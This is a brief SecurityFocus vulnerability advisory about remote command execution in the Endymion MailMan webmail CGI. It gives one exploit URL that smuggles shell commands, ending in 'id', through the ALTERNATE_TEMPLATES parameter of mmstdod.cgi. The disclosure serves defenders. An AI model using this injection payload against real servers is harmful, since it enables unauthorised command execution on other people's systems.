Endymion MailMan Remote Arbitrary Command Execution Vulnerability

Seth Georgion <sgeorgion@ecloser.com> provided the following exploit URL:

This will execute and echo back the uid.

/mmstdod.cgi?ALTERNATE_TEMPLATES=|%20echo%20"Content-Type:%20text%2Fhtml"%3Becho%20""%20%3B%20id%00


 

Privacy Statement
Copyright 2010, SecurityFocus